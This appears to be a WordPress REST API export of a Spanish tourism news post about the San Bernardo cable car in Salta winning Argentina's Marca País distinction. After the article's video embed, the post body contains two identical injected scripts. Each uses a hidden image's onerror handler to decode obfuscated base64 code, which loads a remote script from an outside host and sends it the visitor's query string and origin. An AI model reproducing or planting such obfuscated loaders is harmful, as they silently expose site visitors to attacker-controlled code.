{"id":1603,"date":"2022-10-13T10:13:02","date_gmt":"2022-10-13T13:13:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1603"},"modified":"2025-08-14T00:33:21","modified_gmt":"2025-08-14T03:33:21","slug":"el-teleferico-san-bernardo-recibio-la-distincion-marca-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1603","title":{"rendered":"El Telef\u00e9rico San Bernardo recibi\u00f3 la distinci\u00f3n Marca Pa\u00eds"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#584102\"><em>Es un \u00edcono tur\u00edstico de Salta para el mundo y est\u00e1 presente como uno de los productos que representan a Argentina en las principales ferias internacionales.<\/em><\/h4>\n\n\n\n<p>El Telef\u00e9rico San Bernardo se consolida como uno de los productos tur\u00edsticos m\u00e1s destacados del pa\u00eds en el mundo con el reconocimiento de la distinci\u00f3n Marca Pa\u00eds otorgada por el Ministerio de Turismo de la Naci\u00f3n en la Feria Internacional de Turismo (La Rural).<\/p>\n\n\n\n<p>La entrega la realiz\u00f3 la secretaria de Promoci\u00f3n Tur\u00edstica de la Naci\u00f3n,&nbsp;<strong>Yanina Mart\u00ednez&nbsp;<\/strong>destacando como emblema y el potencial de tel<strong>ef\u00e9rico en el mundo. En este acto recibieron el reconocimiento el ministro de Turismo y Deportes&nbsp;<\/strong>Mario Pe\u00f1a y el presidente del Telef\u00e9rico San Bernardo,&nbsp;<strong>Mart\u00edn Miranda<\/strong>.<\/p>\n\n\n\n<p>La Marca Pa\u00eds Argentina es una pol\u00edtica de Estado que busca posicionar a nuestro pa\u00eds en el contexto internacional mediante sus factores diferenciales, sus tradiciones, su cultura, sus productos, entre otros. Es una herramienta de gran utilidad para la construcci\u00f3n de nuestra identidad.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4329-el-teleferico-san-bernardo-recibio-la-distincion-marca-pais-20221004091311.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4329-el-teleferico-san-bernardo-recibio-la-distincion-marca-pais-20221004091311.jpg\" alt=\"El Telef\u00e9rico San Bernardo recibi\u00f3 la distinci\u00f3n Marca Pa\u00eds\" width=\"-342\" height=\"-228\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cEsta distinci\u00f3n es un orgullo, pero tambi\u00e9n una enorme responsabilidad para los que trabajamos en el turismo de Salta porque es un producto que nos representa\u201d, manifest\u00f3 el ministro Pe\u00f1a, recordando que el 12 de diciembre de 2022 el Telef\u00e9rico cumplir\u00e1 35 a\u00f1os.<\/p>\n\n\n\n<p>El Telef\u00e9rico recibe la tercera Marca Pa\u00eds para Salta, que tiene al Tren a las Nubes y el restaurante El Baqueano, como otros emblemas identitarios de Argentina.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Telef\u00e9rico San Bernardo recibi\u00f3 la distinci\u00f3n Marca Pa\u00eds\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/p_QVgE-VZlM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Es un \u00edcono tur\u00edstico de Salta para el mundo y est\u00e1 presente como uno de los productos que representan a Argentina en las principales ferias internacionales. El Telef\u00e9rico San Bernardo se consolida como uno de los productos tur\u00edsticos m\u00e1s destacados del pa\u00eds en el mundo con el reconocimiento de la distinci\u00f3n Marca Pa\u00eds otorgada por [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1604,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1603","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1603"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1603"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1603\/revisions"}],"predecessor-version":[{"id":7320,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1603\/revisions\/7320"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1604"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1603"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1603"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1603"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}